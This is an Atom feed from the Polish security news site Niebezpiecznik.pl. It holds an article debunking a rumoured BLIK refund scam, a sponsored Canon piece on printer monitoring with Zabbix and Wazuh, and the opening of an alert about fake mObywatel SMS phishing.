<?xml version="1.0" encoding="UTF-8" standalone="no"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:thr="http://purl.org/syndication/thread/1.0" xml:lang="en-US">
	<title type="text">Niebezpiecznik.pl</title>
	<subtitle type="text">Piszemy o bezpieczeństwie i nie. Szkolimy programistów i administratorów oraz zwykłe Panie Halinki. No i znamy Twój PIN!</subtitle>

	<updated>2026-05-16T18:02:15Z</updated>

	<link href="https://niebezpiecznik.pl" rel="alternate" type="text/html"/>
	<id>https://niebezpiecznik.pl/feed/atom/</id>
	<link href="https://niebezpiecznik.pl/feed/atom/" rel="self" type="application/atom+xml"/>

	<generator uri="https://wordpress.org/" version="6.9.4">WordPress</generator>
	<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Oszustwo na &#8220;zwrot przelewu BLIK na telefon&#8221;, którego nie ma&#8230;]]></title>
		<link href="https://niebezpiecznik.pl/post/oszustwo-na-zwrot-przelewu-blik-na-telefon-ktorego-nie-ma/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27100</id>
		<updated>2026-05-16T18:02:15Z</updated>
		<published>2026-05-16T17:23:48Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="BLIK"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/oszustwo-na-zwrot-przelewu-blik-na-telefon-ktorego-nie-ma/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/05/Image_2026-05-11_21-38-352_FB6EF80D-8529-479A-87A4-FEED1C506820-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" /></a>Od kilku miesięcy co jakiś czas do naszej redakcji zgłaszały się osoby, które twierdziły, że ktoś chce je oszukać. Bo dostały niespodziewany przelew BLIK-iem na swój numer telefonu a chwilę później odebrały SMS-a lub telefon z prośbą o zwrot tego przelewu. Za każdym razem okazywało się jednak, że to nie próba oszustwa, a zwykła pomyłka [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/oszustwo-na-zwrot-przelewu-blik-na-telefon-ktorego-nie-ma/"><![CDATA[<p>Od kilku miesięcy co jakiś czas do naszej redakcji zgłaszały się osoby, które twierdziły, że ktoś chce je oszukać. Bo dostały <strong>niespodziewany przelew BLIK-iem</strong> na swój numer telefonu a chwilę później odebrały SMS-a lub telefon z prośbą o zwrot tego przelewu. Za każdym razem okazywało się jednak, że to nie próba oszustwa, a <strong>zwykła pomyłka </strong>&#8212; nadawca zrobił &#8220;literówkę&#8221; w numerze telefonu.<span id="more-27100"></span></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/05/Image_2026-05-11_21-38-352_FB6EF80D-8529-479A-87A4-FEED1C506820.jpg"><img fetchpriority="high" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/05/Image_2026-05-11_21-38-352_FB6EF80D-8529-479A-87A4-FEED1C506820-215x250.jpg" alt="" width="215" height="250" class="aligncenter size-medium wp-image-27101" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/05/Image_2026-05-11_21-38-352_FB6EF80D-8529-479A-87A4-FEED1C506820-215x250.jpg 215w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/Image_2026-05-11_21-38-352_FB6EF80D-8529-479A-87A4-FEED1C506820-517x600.jpg 517w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/Image_2026-05-11_21-38-352_FB6EF80D-8529-479A-87A4-FEED1C506820-768x891.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/Image_2026-05-11_21-38-352_FB6EF80D-8529-479A-87A4-FEED1C506820.jpg 1164w" sizes="(max-width: 215px) 100vw, 215px" /></a></p>
<p>Nikogo, kto przez chwilę się zastanowi nad tym rzekomym scenariuszem ataku, nie powinno dziwić, że to nie oszustwo. Bo ekonomicznie tego typu atak po prostu nie ma żadnego sensu:</p>
<ul>
<li>złodziejom niczego nie daje taki dodatkowy &#8220;hop&#8221; przez przypadkową osobę &#8212; po co ktoś miałby wysyłać pieniądze na Twój numer telefonu Ciebie, skoro może to od razu zrobić na numer docelowy? Organy ścigania i tak zawsze poznają zarówno pierwotne źródło i docelowy numer. Nawet jak kasa przejdzie przez 50 pośredników.</li>
<li>a wręcz jest to dla nich <strong>dodatkowe ryzyko</strong> &#8212; bo możesz sobie te niespodziewane pieniądze przywłaszczyć, nie odeślesz ich.</li>
</ul>
<p>Niektórzy spekulowali, że atak mógłby mieć na celu pozyskanie informacji (imię i nazwisko) &#8220;ofiary&#8221;, bo jeśli uda się ją przekonać do zwrotu, to nadawca może te informacje odczytać z opisu przelewu. Tylko i z tą teorią są dwa problemy:</p>
<ul>
<li>Jest wiele, zdecydowanie prostszych, szybszych i tańszych sposobów na ustalenia nazwiska użytkownika danego numeru telefonicznego (o wszystkich mówimy na <a href="https://niebezpiecznik.pl/post/uruchamiamy-2-dniowe-praktyczne-szkolenie-z-osint-u/" target="_blank">naszych szkoleniach z OSINT-u</a>) </li>
<li>Sporo z &#8220;pomylonych&#8221; przelewów było na kwoty 1000+ i szczerze wątpimy, że z powodów, które wymieniliśmy wyżej, ktoś ryzykowałby stratę takich pieniędzy tylko po to, aby ustalić w taki sposób czyjeś nazwisko, zwłaszcza że jeśli obdarowany zgłosi niespodziewany przelew do swojego banku, to ten zwróci pieniądze nadawcy bez ujawniania danych odbiorcy.</li>
</ul>
<h3>Skąd się wzięła ta plotka?</h3>
<p>Ostrzeżenia przed &#8220;niespodziewanymi przelewami BLIK&#8221; co jakiś czas pojawiają się w mediach społecznościowych i niosą się viralem. Popatrzcie tylko, jak komentujący <a href="https://x.com/sknerus_/status/2055558876326674790" target="_blank">w tym wątku</a> przekonują, że to scam. Co więcej, przed oszustwem na &#8220;niespodziewanego BLIK-a&#8221; ostrzegano nawet na jednej z konferencji dot. cyberbezpieczeństwa. Komunikaty opublikowało też kilka poważniejszych organizacji. </p>
<p>Zakładamy, że ostrzegający mieli dobre intencje, więc nie będziemy tu palcami nikogo wytykać. Wierzymy, że chcieli szczerze ostrzec innych przed zagrożeniem. Ale ostrzegają przed atakiem, którego nie ma. </p>
<p>Skąd się wzięła ta plotka? Nie wiemy. Ale wydaje nam się, że jest to efekt jakiegoś &#8220;głuchego telefonu&#8221; i osoby mieszają tę, niegroźną dla odbiorcy pomylonego przelewu sytuację, z innymi oszustwami, w którym ktoś faktycznie robi za &#8220;słupa&#8221; lub pojawia się motyw zwrotu.</p>
<h3>Rzeczywiste oszustwo &#8220;na słupa&#8221; wygląda tak</h3>
<ul>
<li>Ty kupujesz coś na aukcji, z ogłoszenia lub w sklepie internetowym.</li>
<li>Sprzedawca prosi o płatność (np. BLIK-iem na numer telefonu XXX ale może to być też przelew tradycyjny)</li>
<li>Wykonujesz przelew tradycyjny albo na numer telefonu XXX</li>
<li>Nie otrzymujesz rzeczy za którą płaciłeś</li>
<li>Idziesz na policję</li>
<li>Policja ustala, że XXX należy do Jana Kowalskiego</li>
<li>Jan Kowalski potwierdza, że otrzymał od Ciebie pieniądze, ale wskazuje &#8212; zgodnie z prawdą &#8212; że była to opłata za zamówienie Adama Nowaka, które wysłał Nowakowi do paczkomatu i przedstawia na to dowody</li>
<li>Wychodzi na jaw, że opłaciłeś oszustowi zamówienie w sklepie Jana Kowalskiego, a Adam Nowak w rzeczywistości nie istnieje, oszust podał fałszywe dane osobowe, a opłacony przez Ciebie przedmiot odebrał w paczkomacie.</li>
<li>Jedyny ślad jaki ma policja to IP (z VPN-a), lewy adres e-mail oszusta oraz ID Paczkomatu.</li>
</ul>
<p>Tylko, jak widzicie, nie ma tu żadnego pomylonego przelewu ani prośby o zwrot. Prośba o zwrot pojawia się za to w jednym z wariantów tzw. return scamu:</p>
<ul>
<li>Złodziej przejmuje konto ofiary w serwisie internetowym.</li>
<li>W imieniu ofiary zwraca się o zwrot np. kredytów/salda</li>
<li>Prosi o zwrot inną metodą płatności niż ofiara dokonała zakupu/wpłaty.</li>
<li>Jeśli sklep przystanie na zwrot, przekaże środki na konto kontrolowane przez złodzieja</li>
</ul>
<p>Tylko, jak widzicie, tu znów nie ma niespodziewanego przelewu, a prośba o zwrot kierowana jest do serwisu.</p>
<p>Jest też wariant &#8220;piramidowy&#8221;. Kiedy ktoś przystępuje do schematu piramidy, oszuści proszą aby dokonał wpłaty, ale pieniądze te trafią do innego uczestnika piramidy, który otrzymuje je jako &#8220;zysk&#8221;. W tym oszustwie jedne osoby nieświadomie finansują inne. Ale przelewy są spodziewane. </p>
<h3>Dostałem niespodziewany przelew &#8212; co robić, jak żyć?</h3>
<p>W przypadku otrzymania niespodziewanego przelewu, który faktycznie jest pomyłką, rekomendujemy aby nie zwracać go samodzielnie, bezpośrednio, a uruchomić w swoim banku procedurę zwrotu przez bank. Zalety takiego podejścia są dwie:</p>
<ul>
<li>Nadawca przelewu po odesłaniu środków nie będzie znał Twoich danych, bo przelew dostanie z bankowego rachunku technicznego</li>
<li>Łatwiej będzie wytłumaczyć sprawę urzędowi skarbowemu, w przypadku (małoprawdopodobnej) kontroli w przyszłości</li>
</ul>
<p>W temacie tego nieistniejącego oszustwa na zwrot pomyłkowego przelewu nagraliśmy krótką rolkę. Za publikację niniejszego artykułu nie otrzymaliśmy żadnego wynagrodzenia, ale za przygotowanie rolki BLIK przesłał nam BLIK-a, więc oficjalnie należy ją traktować jako materiał sponsorowany Choć tak naprawdę ta współpraca z Blikiem jedynie zmotywowała nas do publikacji, którą szykowaliśmy już od dawna.  </p>
<p><iframe width="324" height="576" src="https://www.youtube.com/embed/3suIcWp8Ros" title="Pomyłka w przelewie BLIK to &#x274c; nie oszustwo" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/oszustwo-na-zwrot-przelewu-blik-na-telefon-ktorego-nie-ma/#comments" rel="replies" thr:count="0" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/oszustwo-na-zwrot-przelewu-blik-na-telefon-ktorego-nie-ma/feed/atom/" rel="replies" thr:count="0" type="application/atom+xml"/>
			<thr:total>0</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Architektura nadzoru: czyli jak wojownik IT włącza drukarki w system obrony zgodny z NIS2, DORA i zasadami cyberdojo]]></title>
		<link href="https://niebezpiecznik.pl/post/architektura-nadzoru-czyli-jak-wojownik-it-wlacza-drukarki-w-system-obrony-zgodny-z-nis2-dora-i-zasadami-cyberdojo/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27090</id>
		<updated>2026-05-11T14:14:07Z</updated>
		<published>2026-05-11T17:00:24Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="ARTYKUŁ SPONSOROWANY"/><category scheme="https://niebezpiecznik.pl" term="Canon"/><category scheme="https://niebezpiecznik.pl" term="drukarki"/><category scheme="https://niebezpiecznik.pl" term="iWEMC"/><category scheme="https://niebezpiecznik.pl" term="NIS2"/><category scheme="https://niebezpiecznik.pl" term="Wazuh"/><category scheme="https://niebezpiecznik.pl" term="Zabbix"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/architektura-nadzoru-czyli-jak-wojownik-it-wlacza-drukarki-w-system-obrony-zgodny-z-nis2-dora-i-zasadami-cyberdojo/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/05/Niebezpiecznik_480x480_7-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/05/Niebezpiecznik_480x480_7-150x150.jpg 150w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/Niebezpiecznik_480x480_7-250x250.jpg 250w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/Niebezpiecznik_480x480_7.jpg 480w" sizes="auto, (max-width: 100px) 100vw, 100px" /></a>W poprzedniej części omówiliśmy utwardzanie drukarek i urządzeń wielofunkcyjnych (MFP) &#8211; zamykanie bram, wyłączanie niepotrzebnych usług i hartowanie konfiguracji. Jeśli przegapiłeś tę część – warto do niej wrócić. Jeśli masz to za sobą &#8211; czas na kolejny krok. Tym razem skupimy się na zbudowaniu architektury ciągłego nadzoru (monitorowanie ustawień, dokumentowanie zmian). To ważne nie tylko [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/architektura-nadzoru-czyli-jak-wojownik-it-wlacza-drukarki-w-system-obrony-zgodny-z-nis2-dora-i-zasadami-cyberdojo/"><![CDATA[<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/05/Niebezpiecznik_850x350_header2.jpg"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-27093" src="https://niebezpiecznik.pl/wp-content/uploads/2026/05/Niebezpiecznik_850x350_header2-600x263.jpg" alt="" width="600" height="263" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/05/Niebezpiecznik_850x350_header2-600x263.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/Niebezpiecznik_850x350_header2-350x153.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/Niebezpiecznik_850x350_header2-768x336.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/Niebezpiecznik_850x350_header2.jpg 800w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p>W poprzedniej części omówiliśmy utwardzanie drukarek i urządzeń wielofunkcyjnych (MFP) &#8211; zamykanie bram, wyłączanie niepotrzebnych usług i hartowanie konfiguracji. Jeśli przegapiłeś tę część – <a href="https://niebezpiecznik.pl/post/dlaczego-drukarki-w-stanie-fabrycznym-to-stan-zagrozenia-a-nie-gotowosci/" target="_blank" rel="noopener">warto do niej wrócić</a>. Jeśli masz to za sobą &#8211; czas na kolejny krok.</p>
<p>Tym razem skupimy się na zbudowaniu architektury ciągłego nadzoru (monitorowanie ustawień, dokumentowanie zmian). To ważne nie tylko operacyjnie. Unijne regulacje NIS2 i DORA wzmacniają wymóg traktowania bezpieczeństwa jako procesu, który trzeba kontrolować, dokumentować i utrzymywać.</p>
<p class="p1"><b>SPIS TREŚCI</b></p>
<ul class="ul1">
<li class="li2"><a href="#zabbix">Co monitorować na urządzeniach MFP (Zabix)</a></li>
<li class="li2"><a href="#wazuh">Jak wykrywać to, czego nie widać na pierwszy rzut oka: logowania nocą, bruteforce, ciche zmiany polityk i zacieranie śladów (Wazuh)</a></li>
<li class="li3"><a href="#iwemc">Centralne zarządzanie flotą MFP (iWEMC)</a></li>
<li class="li3"><a href="#nis2">NIS2, DORA i prawa shōguna. Jak trio Zabbix + Wazuh + iWEMC pomaga sprostać audytom, regulacjom i wymaganiom ciągłości działania.</a></li>
</ul>
<p class="p1">Nie masz czasu na lekturę całości artykułu? <a href="https://www.youtube.com/watch?v=62OvqB6HcTY&amp;list=PL8RzQcu8B4N86tGlqTA5hqXDuLa3R6HQv&amp;index=3">Zacznij od filmu</a>! Zobacz, jak patrzymy na to zagadnienie, a po konkrety i przykłady &#8211; kontynuuj lekturę artykułu.</p>
<p><iframe loading="lazy" title="YouTube video player" src="https://www.youtube.com/embed/62OvqB6HcTY?si=mFpNVOs-or-GNrrL" width="560" height="315" frameborder="0" allowfullscreen="allowfullscreen"></iframe></p>
<p class="p1">Wyobraź sobie twierdzę: mury stoją, bramy zamknięte, most zwodzony uniesiony. Wszystko wygląda bezpiecznie.</p>
<p class="p1">A teraz wyobraź sobie, że <b>straże nie pełnią warty</b>. Nikt nie chodzi po murach. Nikt nie sprawdza, co zmieniło się od wczoraj. Nikt nie zauważa, że od strony rzeki ktoś właśnie przeciąga linę przez niewielką szczelinę w palisadzie.</p>
<p class="p1">Tak właśnie wygląda firmowa sieć z drukarkami, które zostały utwardzone, <b>ale pozostawione bez nadzoru</b>. <b>A nadzór to proces, a nie pojedyncze zdarzenie.</b></p>
<p class="p1">Czas zatem zbudować <b>Architekturę Nadzoru</b>. Trzy narzędzia, trzy role, jeden cel: bezpieczeństwo.</p>
<p><a name="zabbix"></a></p>
<h3 class="p1"><b>1. Zabbix &#8211; Strażnik Bram i Mistrz Obserwacji</b></h3>
<p class="p2">Każda szanująca się twierdza feudalnej Japonii miała strażników na wieżach. Nie żeby walczyli &#8211; żeby czuwali i w razie potrzeby podnosili alarm.</p>
<p class="p2">W świecie IT tę rolę odgrywa <b>Zabbix</b> &#8211; open-source&#8217;owy system monitoringu, który nie śpi, nie bierze L4 i nie wychodzi wcześniej w piątek. Ale jest jeden warunek, od którego nie ma odwołania: <b>SNMP v3</b>. Nie v1. Nie v2. <b>v3!!!</b></p>
<p class="p2">Używanie starszych wersji SNMP to jak wysyłanie zaszyfrowanego raportu… gońcem, który głośno czyta go po drodze na każdym skrzyżowaniu. Brak autentykacji, brak szyfrowania &#8211; klasyczne zaproszenie do podsłuchu.</p>
<p class="p2">Zabbix z SNMP v3 potrafi:</p>
<ul class="ul1">
<li class="li2"><b>Wyłapać usługi niezgodne z polityką;<br />
</b>Ktoś (albo coś) włączył HTTP tam, gdzie powinien być wyłącznie HTTPS? Alarm. Natychmiast.</li>
<li class="li2"><b>Monitorować parametry sieciowe<br />
</b>Nagła zmiana DNS? Brama domyślna wskazuje na nieznany adres? To może być atak typu ManintheMiddle. Ninja próbuje przekierować ruch przez własny posterunek.</li>
<li class="li2"><b>Alarmować o błędach sprzętowych.<br />
</b>Problemy z dyskiem, TPM, modułami kryptograficznymi &#8211; Zabbix poinformuje Cię <i>zanim</i> przestanie działać drukarka, <i>zanim</i> przerwie się proces biznesowy, <i>zanim</i> ktoś wpadnie do Twojego biura z pytaniem „dlaczego nic nie działa&#8221;.<b><br />
</b></li>
</ul>
<p class="p2">&#8211; Dla środowisk produkcyjnych i biurowych infrastruktura druku i skanowania staje się integralnym, niepomijalnym elementem łańcucha bezpieczeństwa. Monitoring umożliwia szybką reakcję i zapewnia, że środowisko jest pod kontrolą (zarówno w zgodzie z politykami jak i na potrzeby audytów zewnętrznych) – komentuje Darek Szwed, ekspert Canon Polska w obszarze bezpieczeństwa danych.</p>
<p class="p2">Zabbix stoi na murach i patrzy. To jego jedyne zadanie. I jest w tym nieludzko dobry.</p>
<p><a name="wazuh"></a></p>
<h3 class="p1"><b>2. Wazuh – Zwiadowca w cieniu</b></h3>
<p class="p2">Strażnik na murach widzi to, co dzieje się otwarcie. Ale ninja rzadko wybiera bramę. Wchodzi,<b> gdy nikt nie patrzy</b> &#8211; o nietypowej porze, nietypową ścieżką, w przebraniu kogoś, kto wygląda „jak swój”.</p>
<p class="p2">Do wyłapania takich ruchów potrzebujesz <b>zwiadowcy</b>, który potrafi łączyć ślady. Kogoś, kto nie tylko zauważy pojedyncze zdarzenie, ale <b>zrozumie, co ono oznacza w kontekście całej twierdzy</b>.</p>
<p class="p2">Tą rolę pełni <b>Wazuh</b> &#8211; opensource&#8217;owy SIEM/XDR, który zbiera logi z urządzeń MFP przez zaszyfrowany Syslog (TLS 1.3) i <b>skleja je w jedną mapę zdarzeń.</b></p>
<p class="p2"><b>Co konkretnie demaskuje?</b></p>
<ul class="ul1">
<li class="li2"><b>Ataki brute-force: </b>seria błędnych logowań w krótkim czasie to klasyczny sygnał: ktoś testuje, czy przypadkiem nie zostawiłeś otwartej furtki. Wazuh to zauważy i podniesie alarm, zanim napastnik trafi na właściwe hasło.</li>
<li class="li2"><b>Aktywność poza godzinami<br />
</b>Logowanie o 02:37? Skanowanie portów w środku nocy? Zmiana ustawień „gdy nikt nie patrzy&#8221;? To klasyczny sygnał, że ktoś próbuje działać w cieniu.</li>
<li class="li2"><b>Zmiany polityk bezpieczeństwa<br />
</b>Ktoś zmodyfikował polityki bezpieczeństwa, które sam wcześniej ustawiłeś? Wazuh wyśle Ci alert, zanim zdążysz zaparzyć kawę. Żadnych cichych nadpisań.</li>
<li class="li2"><b>Nieoczekiwane operacje czyszczenia logów urządzeń</b>, sugerujące że ktoś czyści ślady po nieautoryzowanych działaniach.</li>
</ul>
<p class="p3">Wazuh nie zastępuje Zabbiksa, ale go uzupełnia.<br />
Zabbix regularnie sprawdza i alarmuje, że <i>coś się zmieniło</i>. Wazuh NATYCHMIAST raportuje: <i>co, kiedy, skąd i czy to wrogie działania</i>.</p>
<p><a name="iwemc"></a></p>
<h3 class="p1"><b>3. iWEMC – Zarządca twierdzy </b></h3>
<p class="p2">Zabbix widzi. Wazuh analizuje. Ale ochroną twierdzy trzeba jeszcze zarządzać.</p>
<p>Tę rolę w szeregach klanu Canon pełni<b> iW Enterprise Management Console (iWEMC)</b> &#8211; centrum dowodzenia dla całej floty MFP. Daje coś, czego większość administratorów IT skrycie pożąda: <b>jeden punkt kontroli dla setek urządzeń jednocześnie</b>.</p>
<p class="p2">Wyobraź sobie, że zamiast chodzić od drukarki do drukarki i ręcznie klikać w ustawienia (bo tak się „zawsze robiło&#8221;), tworzysz jeden wzorcowy profil konfiguracji:</p>
<ul class="ul1">
<li class="li3">porty: co niepotrzebne &#8211; wyłączone,</li>
<li class="li3">protokół: SMB v3 wymuszony,</li>
<li class="li3">uwierzytelnianie sieciowe: 802.1x ustawione,</li>
<li class="li3">certyfikaty: wdrożone.</li>
</ul>
<p class="p2">Jednym ruchem. Jak wykucie pierwszego ostrza &#8211; a potem hartowanie wszystkich pozostałych według tej samej formy.</p>
<p class="p2">Oczywiście iWEMC to sprawny wykonawca zleconych działań, natomiast jak każdy efektywny pracownik będzie działał tam, gdzie jest to niezbędne – w tym zakresie jego funkcje wykraczają poza oferowane przez otwarte rozwiązania klasy Zabbix. Realizuje to poprzez procedury zarządzania i konfiguracji zastrzeżone dla rozwiązań producenckich. W tym przede wszystkim zarządzanie aktualizacją oprogramowania układowego.</p>
<h4 class="p2"><b>Zarządzanie firmware – aktualizacja całej (lub wybranego fragmentu) floty jednym poleceniem.</b></h4>
<p class="p2">Planowanie aktualizacji dla dziesiątek czy setek urządzeń, kiedyś żmudne i rozproszone, staje się <b>ustawieniem jednej linii szyku</b>: Planowanie terminów i listy urządzeń pozwala na wdrożenie polityk pilotażowych, weryfikujących zgodność nowej wersji oprogramowania z politykami i standardami firmy. Zarządca wyznacza termin, politykę i zakres &#8211; a cała flota wykonuje ten sam manewr w tym samym czasie.</p>
<h4 class="p2"><b>Kontrola zgodności, czyli dyscyplina bez wyjątków</b></h4>
<p class="p2">Każda zmiana, każdy odchył, każdy nieoczekiwane zdarzenie, każda „twórcza interpretacja” zasad przez administratora lub serwisanta albo użytkownika zostanie wykryta. System (a w zasadzie zestaw narzędzi) natychmiast wskaże różnicę bądź podejrzane wydarzenie, a Zarządca może przywrócić właściwe ustawienia jednym ruchem.</p>
<p class="p2">Żadnych niespodzianek. Żadnych „nie wiem skąd to się wzięło”.</p>
<p class="p2">To właśnie dyscyplina.<br />
To właśnie<b> Droga Samuraja</b>:</p>
<p class="p2">&#8211; Utwardzenie urządzenia to jedno. Utrzymanie go w tym stanie &#8211; to prawdziwa sztuka. A świadomość krytycznych zdarzeń to najwyższy poziom czujności i ochrony.</p>
<p><a name="ni2"></a></p>
<h3 class="p2"><b>NIS2, DORA &#8211; Kodeksy Imperium, którym Samuraj musi sprostać</b></h3>
<p class="p2">Wymogi unijne są jak prawa shōguna &#8211; nie podlegają dyskusji, tylko wykonaniu.</p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/05/tabela_bk.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-27091" src="https://niebezpiecznik.pl/wp-content/uploads/2026/05/tabela_bk-600x303.png" alt="" width="600" height="303" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/05/tabela_bk-600x303.png 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/tabela_bk-350x177.png 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/tabela_bk-768x388.png 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/tabela_bk-1536x776.png 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/tabela_bk-2048x1034.png 2048w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p class="p1">Dobrze ustawione trio Zabbix + Wazuh + iWEMC gwarantuje, że twierdza działa według kodeksu, nie legendy. Kiedy wszystkie elementy obrony są odpowiednio ustawione, Samuraj może nie tylko skutecznie odpychać ataki, ale też <b>przewidywać</b>, <b>zarządzać</b> i <b>utrzymywać porządek</b>, zanim pierwszy ninja w ogóle podejdzie pod bramę.</p>
<p class="p2">Dzięki właściwej architekturze nadzoru:</p>
<ul class="ul1">
<li class="li2">urządzenia przestają żyć własnym życiem,</li>
<li class="li2">flota zaczyna działać jak <b>zorganizowany oddział</b>,</li>
<li class="li2">a każdy element infrastruktury ma swoją rolę, ścieżkę i granice</li>
</ul>
<p class="p2">a Ty podczas audytu możesz spokojnie pić kawę.</p>
<h3 class="p1"><span class="s2"><b>Co dalej?</b></span></h3>
<p class="p1">W kolejnej odsłonie sagi o bezpieczeństwie urządzeń drukujących spojrzymy dalej niż mury warowni: na <b>architekturę sieci druku, segmentację, izolację floty i fundamenty Zero Trust w świecie dokumentów</b>.</p>
<p>&#8211; Skuteczny monitoring to nie tylko dane o systemie. To przede wszystkim kontrola tego, dokąd płyną dane i kto ma do nich dostęp – podsumowuje Darek Szwed.</p>
<p>Pójdź z nami dalej drogą bezpieczeństwa.<br />
Ninja nie śpią.<br />
Samuraj &#8211; też nie.</p>
<div class="info">Autorem niniejszego artykułu jest Canon Polska, producent i dostawca rozwiązań do druku i obiegu dokumentów, w których bezpieczeństwo jest elementem architektury, a nie dodatkiem. Artykuł jest artykułem sponsorowanym i za jego publikację otrzymaliśmy wynagrodzenie.Rozwiązania do druku od Canon Polska stawiają na bezpieczeństwo, co widać zarówno w zaawansowanych urządzeniach wielofunkcyjnych z serii imageFORCE, tworzonych z myślą o środowiskach o podwyższonych wymaganiach bezpieczeństwa, jak i laserowych drukarkach Canon iSENSYS, które już w podstawowej konfiguracji oferują szyfrowanie danych, silne mechanizmy uwierzytelniania i nowoczesne standardy sieciowe.</div>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/architektura-nadzoru-czyli-jak-wojownik-it-wlacza-drukarki-w-system-obrony-zgodny-z-nis2-dora-i-zasadami-cyberdojo/#comments" rel="replies" thr:count="4" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/architektura-nadzoru-czyli-jak-wojownik-it-wlacza-drukarki-w-system-obrony-zgodny-z-nis2-dora-i-zasadami-cyberdojo/feed/atom/" rel="replies" thr:count="4" type="application/atom+xml"/>
			<thr:total>4</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[&#x26a0;&#xfe0f; Uwaga na złośliwe SMS-y od mObywatela!]]></title>
		<link href="https://niebezpiecznik.pl/post/mobywatel-mandat/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27085</id>
		<updated>2026-05-08T05:15:30Z</updated>
		<published>2026-05-07T14:27:11Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="cyberalert"/><category scheme="https://niebezpiecznik.pl" term="mObywatel"/><category scheme="https://niebezpiecznik.pl" term="phishing"/><category scheme="https://niebezpiecznik.pl" term="SMS"/><category scheme="https://niebezpiecznik.pl" term="spoofing"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/mobywatel-mandat/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/05/mobywatel-sms-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Otrzymujemy zgłoszenia, że na polskie numery telefonów rozsyłana jest kampania SMS-owa, w ramach której przestępcy wysyłają SMS-y z nazwy &#8220;mObywatel&#8221; &#8212; czyli dokładnie tej samej, którą posługuje się oficjalny rządowy system. Wiadomości brzmią wiarygodnie i dotyczą &#8220;wykrycia wykroczenia drogowego&#8221;. Oto jak wygląda ścieżka ataku: Kliknięcie w link z SMS przekierowuje ofiarę na stronę, na której [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/mobywatel-mandat/"><![CDATA[<p>Otrzymujemy zgłoszenia, że na polskie numery telefonów rozsyłana jest kampania SMS-owa, w ramach której przestępcy wysyłają SMS-y z nazwy &#8220;mObywatel&#8221; &#8212; czyli dokładnie tej samej, którą posługuje się oficjalny rządowy system. Wiadomości brzmią wiarygodnie i dotyczą &#8220;wykrycia wykroczenia drogowego&#8221;. Oto jak wygląda ścieżka ataku:</p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/05/mobywatel-sms-scaled.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/05/mobywatel-sms-600x338.jpg" class="aligncenter size-large wp-image-27086" width="600" height="338" alt="" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/05/mobywatel-sms-600x338.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/mobywatel-sms-350x197.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/mobywatel-sms-768x432.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/mobywatel-sms-1536x864.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/05/mobywatel-sms-2048x1152.jpg 2048w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
